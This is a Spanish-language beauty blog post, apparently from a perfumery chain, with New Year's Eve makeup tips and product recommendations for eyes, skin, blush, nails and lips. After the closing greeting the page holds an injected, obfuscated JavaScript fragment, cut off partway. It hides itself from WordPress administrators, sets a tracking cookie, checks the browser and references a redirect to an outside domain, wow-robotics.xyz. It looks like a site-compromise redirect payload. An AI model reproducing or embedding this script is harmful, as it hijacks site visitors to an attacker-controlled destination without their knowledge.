La última noche del año debería llamarse la noche de las estrellas fugaces. La noche en la que más deseos pedimos y en la que más queremos brillar, exacto, ¡como una estrella! Por eso, en este artículo, vamos a daros nuestros mejores consejos para brillar en nochevieja. Por supuesto, solo os daremos consejos sencillos, rápidos y con cosas que todas tenemos por casa. La clave es brillar de forma natural y sin complicaciones para centrarnos en lo importante: disfrutar con los nuestros. ¿Estáis preparadas?

chica joven y guapa mira a camara con las manos sobre la sien lleva un vestido de noche con brillantes y el pelo suelo

Esta noche vieja brilla como una estrella empezando por los ojos

De todo el look de maquillaje, una mirada con profundidad y pestañas de infarto es lo que más nos hará brillar en Noche Vieja. También, la que más nos costará perfeccionar. La red está llena de trucos, pero ninguno tan sencillo y fácil de aplicar como el vídeo tutorial sobre cómo hacer un cat eye de Lucía Puebla, maquilladora profesional. ¡Os lo aseguramos! Por otro lado, para potenciar de verdad vuestras pestañas, os recomendamos aplicar hasta tres capas de un rímel que no apelmace ni os deje grumos como LE VOLUME REVOLUTION de CHANEL y su cepillo único en el mundo. Si este año queremos innovar, las pestañas postizas Luxe Magnetic son la clave para un look natural y sofisticado. Además, son muy fáciles de poner y permiten hasta 15 usos sin pegamento. Perfectas para dejar a la familia boquiabierta.

Esta noche vieja brilla como una estrella con la piel natural y sin imperfecciones 

En Perfumerías Tin Tin somos auténticas fans del “menos es más” a la hora de maquillarnos. Excepto cuando utilizamos brilli brilli, pero esa es hora historia. La clave para conseguir un look sencillo y natural, que os permita brillar en Noche Vieja, es una piel libre de imperfecciones. Para lograrlo, debemos contar con una base de maquillaje con cobertura, pero ligera; y un eficaz corrector. Double Wear Stay-in-Place Spf10 de ESTÉE LAUDER es nuestra opción ganadora porque tiene una duración de hasta 24h, no genera grasa ni se derrite con el calor. Si vamos a bailar toda la noche – y esperamos que así sea – es justo lo que necesitamos.

A la hora de elegir corrector os recomendamos uno tipo iluminador como TOUCHE ÉCLAT de Yves Saint Laurent. Este corrector es el aura de luz que toda estrella necesita. Su pigmentación es idónea para potenciar la luz del rostro y cubrir las imperfecciones. Brillar, amigas, brillar.

primer plano de una chica joven de tez palida mira de perfil triste y lleva un vestido arreglado de noche

Esta noche vieja brilla como una estrella con los pómulos sonrosados

Los labios y los ojos son el centro de atención de cualquier maquillaje, correcto, pero unos pómulos sonrosados son la pieza clave que hace que todo lo demás funcione. Sonrojarse es un gesto natural del ser humano que denota salud, pasión, amor, felicidad… justo los sentimientos que os deseamos para empezar el año 2020 con ganas. ¿Queréis un colorete modulable y de larga duración? JOLI BLUSH de CLARINS os va a encantar. ¡De nada!

Esta noche vieja brilla como una estrella con el rojo pasión

El rojo es un color muy especial, un clásico que siempre favorece. Además, en Nochevieja, el rojo pasión es el color de la suerte, por lo que no debe faltar en nuestro look si queremos brillar como estrellas. Para las uñas lo tenemos fácil, un esmalte rojo de gran pigmentación y a buen precio como el que ofrece Last & Go de Essence y listo. Sin embargo, elegir labial no es tan sencillo debido a la gran cantidad de comida y bebida que vamos a ingerir esa noche o, ¿acaso vamos a privarnos de los manjares de la noche solo por estar con la boquita bien pintada? Jamás. Por eso, os recomendamos escoger un labial de larga duración como Ultra Rouge de Dior que ofrece una pigmentación satinada muy bonita y buena hidratación. La mejor forma de saludar al 2020 como se merece… ¡con dos besos!

primerisimo primer plano de una mujer joven con los labios pintados de rojo cuyo rostro no vemos al completo porque lo oculta una sombra

Con estos sencillos trucos no se os resistirá nada: ni las patas de cangrejo, ni las botellas de cava, ni los mejores deseos. ¡FELIZ AÑO NUEVO!

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone